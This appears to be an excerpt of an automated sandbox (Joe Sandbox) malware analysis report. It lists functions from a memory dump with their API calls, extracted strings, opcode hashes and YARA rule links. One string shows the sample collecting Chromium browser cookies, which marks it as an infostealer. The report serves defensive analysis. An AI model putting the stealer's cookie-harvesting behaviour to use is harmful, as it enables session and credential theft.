                                                  • API String ID: 3960555810-0
                                                  • Opcode ID: 6f46a13c0aa0b7654f18575ecf1f993a5a7f86b66539d4131e35dda1a033a0ea
                                                  • Instruction ID: 26d1ab8a566456eb07f38489764a1b78f0c038120b9fb3ec70f4d02be8e79fd2
                                                  • Opcode Fuzzy Hash: 6f46a13c0aa0b7654f18575ecf1f993a5a7f86b66539d4131e35dda1a033a0ea
                                                  • Instruction Fuzzy Hash: BAC16A70504B808BD726CF38C4A47E7BBE1BF1A304F58099ED4EB9B692C739A446CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B23883 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,00000000), ref: 00B2392C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 5ce38569de6871cca6192710b3aebd5586d08dce6668fed1fe7abe3b58d96c54
                                                  • Instruction ID: 001434edcc2c99b290a6816a29dd79d50565aa004f5b0f2f13e76f24c59ec69f
                                                  • Opcode Fuzzy Hash: 5ce38569de6871cca6192710b3aebd5586d08dce6668fed1fe7abe3b58d96c54
                                                  • Instruction Fuzzy Hash: 9E416D702047018FD715CF28D894B167BE2EF46328F24C59CD8AA4B796C376E8478BD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B19654 Relevance: 1.6, APIs: 1, Instructions: 90memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: AllocString
                                                  • String ID:
                                                  • API String ID: 2525500382-0
                                                  • Opcode ID: a8d2dc877f6dddbfaf36679e788cab2c1f1e749b760f76a94ac01b0f6c62132c
                                                  • Instruction ID: 2f7c2f3e9b17b904cd567f6d45a9dd2040979dd6fc4f1541606a45028c7f2e96
                                                  • Opcode Fuzzy Hash: a8d2dc877f6dddbfaf36679e788cab2c1f1e749b760f76a94ac01b0f6c62132c
                                                  • Instruction Fuzzy Hash: 4F411970108B82DED311CF28C498756FFE1BF56304F54868DD0A98BB92C379B569CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B23A31 Relevance: 1.6, APIs: 1, Instructions: 79memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(?,00000000), ref: 00B23ACF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 06b9c2d74c46526b3dc5a12872708ba5fa174997325d88dacacdc4b2db5913f5
                                                  • Instruction ID: 258f343d907b1fdd9e68f6a8b4e96325c231ed77c44f10e18b9cfea5e4d45eaa
                                                  • Opcode Fuzzy Hash: 06b9c2d74c46526b3dc5a12872708ba5fa174997325d88dacacdc4b2db5913f5
                                                  • Instruction Fuzzy Hash: 4221C535A097808FD3128B14DC916867BB3EFC631531EC4AEC0DA97A67C539680BCB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B25145 Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 4f36a4cf0bfe3819e409867ea90c884df156057b69d045a89196e1f8a31def46
                                                  • Instruction ID: c20578662f6b1f6779400c5b92198256a81246f57d08acba94b400894e0b9800
                                                  • Opcode Fuzzy Hash: 4f36a4cf0bfe3819e409867ea90c884df156057b69d045a89196e1f8a31def46
                                                  • Instruction Fuzzy Hash: 3A21B0B1544700EFCB28CF24ECA1A1A7BE2EB45305B14C59CDC4A9B76AEB30E511CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B2583D Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 00B258F0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: e14c2d6d50b89563df087759dd98322cb34595241b25d0741cac97ab763c8bce
                                                  • Instruction ID: aa2d6a24f248441bbe43993535df1507dbd6f55f66504fde47fbf43bea48591a
                                                  • Opcode Fuzzy Hash: e14c2d6d50b89563df087759dd98322cb34595241b25d0741cac97ab763c8bce
                                                  • Instruction Fuzzy Hash: C21134716093409FD708CF14D4A4B6FBBE2FBC9318F24895DE09A47280C775D906CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00AF94F0 Relevance: 11.6, Strings: 9, Instructions: 315COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3@O@$4;Ox$@e$R|`$azbc$bjXX$iJ0G$jzy{$tosJ
                                                  • API String ID: 0-792757147
                                                  • Opcode ID: d7dd0e96cb0ac353678dc613c577d74b776eafa1f1cfff1ed33521f98c02ad47
                                                  • Instruction ID: 9a42b12bdd9f9d5300b4ade3fa6e894b3bcbb67f472a2878d1225bcd1fc6828b
                                                  • Opcode Fuzzy Hash: d7dd0e96cb0ac353678dc613c577d74b776eafa1f1cfff1ed33521f98c02ad47
                                                  • Instruction Fuzzy Hash: 7BB126B010C3818FD725CF19C0907ABBBE1BF96344F14895DE5E59B392C775890ACB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00CE4496 Relevance: 9.2, Strings: 7, Instructions: 406COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !$*$A$E$K$d$k
                                                  • API String ID: 0-47205665
                                                  • Opcode ID: 9760e44ae8c45a293103fa16fba4c43c0672e528021ae1b87a4fe41c3734a6e1
                                                  • Instruction ID: 81e7497a5380a45a653ac545904ae8ea21fa8aedfa7363daec8ed03799a19832
                                                  • Opcode Fuzzy Hash: 9760e44ae8c45a293103fa16fba4c43c0672e528021ae1b87a4fe41c3734a6e1
                                                  • Instruction Fuzzy Hash: 22D1883250CB464BD30CEE28E4415BAB3D2EBD6311F608A3EC4CBC7591DB76A51ADB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B06A89 Relevance: 7.8, Strings: 6, Instructions: 271COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CJAr$HwuJ$NHyJ$dTd`$v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$Wk
                                                  • API String ID: 0-627340680
                                                  • Opcode ID: bd38c835f9c53bcb058a03f8ec15d207a86d2951bf519fff9010c12ed878824e
                                                  • Instruction ID: 73de285205deb69c4f4226c42028f0a304e4c02781f12b0afa818be862d3eb18
                                                  • Opcode Fuzzy Hash: bd38c835f9c53bcb058a03f8ec15d207a86d2951bf519fff9010c12ed878824e
                                                  • Instruction Fuzzy Hash: 3FA158B0604B808FD729CF24C4A17A3BBE1FF56344F1889ADC1EB8B692D735A815CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00CF379E Relevance: 7.7, Strings: 6, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$-$7$9$J$q
                                                  • API String ID: 0-3853673648
                                                  • Opcode ID: d6ee0c91afa6e5f1ca5a51209e416d5c4a3fc5824a8965a06f2cef3a5ed8d6c9
                                                  • Instruction ID: e6e2770332c2e616b15de74bd0c4bdf87bcd85e9e19b613498cc9cd6f26602ab
                                                  • Opcode Fuzzy Hash: d6ee0c91afa6e5f1ca5a51209e416d5c4a3fc5824a8965a06f2cef3a5ed8d6c9
                                                  • Instruction Fuzzy Hash: 4D8165315083228BC718EF28E9404ABF3E6FFC5314F608A7DD5968B5D5E77A611ADB02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E0C1F7 Relevance: 6.5, Strings: 5, Instructions: 208COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$$$'T@&$g$j
                                                  • API String ID: 0-3760437560
                                                  • Opcode ID: 6522e23f3bb0b94f135d8b1daed5476ec3b5bbb6402f8b23c39e50f1593ec572
                                                  • Instruction ID: c9731fe5fc603b5765e018adf8587de1aca3d6c6d3651fdcc9bda939f5457f44
                                                  • Opcode Fuzzy Hash: 6522e23f3bb0b94f135d8b1daed5476ec3b5bbb6402f8b23c39e50f1593ec572
                                                  • Instruction Fuzzy Hash: BA8187711186478BC725EF28D4406EAB7E1FFD2324F64976DC4E28B1D4EB35112ACB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B3BDFC Relevance: 6.4, Strings: 5, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: )$,$5h<L$B$c
                                                  • API String ID: 0-2695263780
                                                  • Opcode ID: 6da8dc7c3bd10b5a684f82f5780e0d4ffa09f9aadfdd017aad118a46c9b42f78
                                                  • Instruction ID: 067c958c04ba9c05f90c7898d6478c44658fbec025813c9bf4ae1b92043c3cd7
                                                  • Opcode Fuzzy Hash: 6da8dc7c3bd10b5a684f82f5780e0d4ffa09f9aadfdd017aad118a46c9b42f78
                                                  • Instruction Fuzzy Hash: 656197311187128BC31CEE2CD8544AAB7E2EFCA310F65877DD5AAC74D8DB76051ACB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00BA46F5 Relevance: 5.5, Strings: 4, Instructions: 471COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$.$e$k
                                                  • API String ID: 0-3409003246
                                                  • Opcode ID: b653b929bb03b938c3c1c55add7c3fde4d438d4d25649875d22428500ae9f60e
                                                  • Instruction ID: cd40b09d38093b8467a24634455e99e59950ebc0c04d7868d08a4ee14cf69e0e
                                                  • Opcode Fuzzy Hash: b653b929bb03b938c3c1c55add7c3fde4d438d4d25649875d22428500ae9f60e
                                                  • Instruction Fuzzy Hash: 8AF156326086168BC728DA38D8915ABB3E2FBC6320F54873DE596C7685E7349516CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D25AAE Relevance: 5.3, Strings: 4, Instructions: 320COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #1M$3$K$i
                                                  • API String ID: 0-756481438
                                                  • Opcode ID: 8e2fe63aaa8cabf38fbb94d9a01d4e76650f1d98f78da23dc32c71d7c0800625
                                                  • Instruction ID: 5e5e86f01ebf06958bcdca2f4c83e38ab70c6d254aad2b3faba764363a8923f0
                                                  • Opcode Fuzzy Hash: 8e2fe63aaa8cabf38fbb94d9a01d4e76650f1d98f78da23dc32c71d7c0800625
                                                  • Instruction Fuzzy Hash: 02B1D9312087028FD708EF69D8914EBB3E2EFC6311F549B6DD4968B6C5DB35A10ACB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00BA3082 Relevance: 5.3, Strings: 4, Instructions: 277COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r$6$S$_
                                                  • API String ID: 0-1940233891
                                                  • Opcode ID: 4732c0d1eee7e0e2de167e41db72e46d6adb1f4e5bc761b02b5ff82dee9126dc
                                                  • Instruction ID: 2a1f2504e5e84b4e68d2878425e03a85490727848c93cc4a8d433d068dc10672
                                                  • Opcode Fuzzy Hash: 4732c0d1eee7e0e2de167e41db72e46d6adb1f4e5bc761b02b5ff82dee9126dc
                                                  • Instruction Fuzzy Hash: FAA1EA36208B528BC718EF79D8914ABB3E2EFC6320F64CB3DD4968B595D7398016DB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C3D35C Relevance: 5.2, Strings: 4, Instructions: 235COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: '$.$J$g
                                                  • API String ID: 0-98118411
                                                  • Opcode ID: 5049f361413907b70a32e68259a64c5926d6e495f572bb831be7148edebee9cf
                                                  • Instruction ID: 7565e11dc17a15dabe69d89c3d57a0579fb2350fe2298d388f883a155d19ad15
                                                  • Opcode Fuzzy Hash: 5049f361413907b70a32e68259a64c5926d6e495f572bb831be7148edebee9cf
                                                  • Instruction Fuzzy Hash: 0881EE365082128BC71CEF38D4A41BAB3D2FBD9320F55967DE4DB87681CB359446DB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D3BC9A Relevance: 4.2, Strings: 3, Instructions: 492COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$=$k
                                                  • API String ID: 0-2428006820
                                                  • Opcode ID: 6cbb7b9b81de341d7a5b0c9eb222f04915adc537c901ded5a020fe8589afe36a
                                                  • Instruction ID: ca38e30946e13013efb4238f616a284e4a74c26008b278e450123ebdb1256a1e
                                                  • Opcode Fuzzy Hash: 6cbb7b9b81de341d7a5b0c9eb222f04915adc537c901ded5a020fe8589afe36a
                                                  • Instruction Fuzzy Hash: 22F1CA365187168BC318DF38D8911FA73E1EBD5320F50CA3DD497C76C5EA79911ACA81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D79672 Relevance: 4.2, Strings: 3, Instructions: 438COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !$.$9
                                                  • API String ID: 0-2314062724
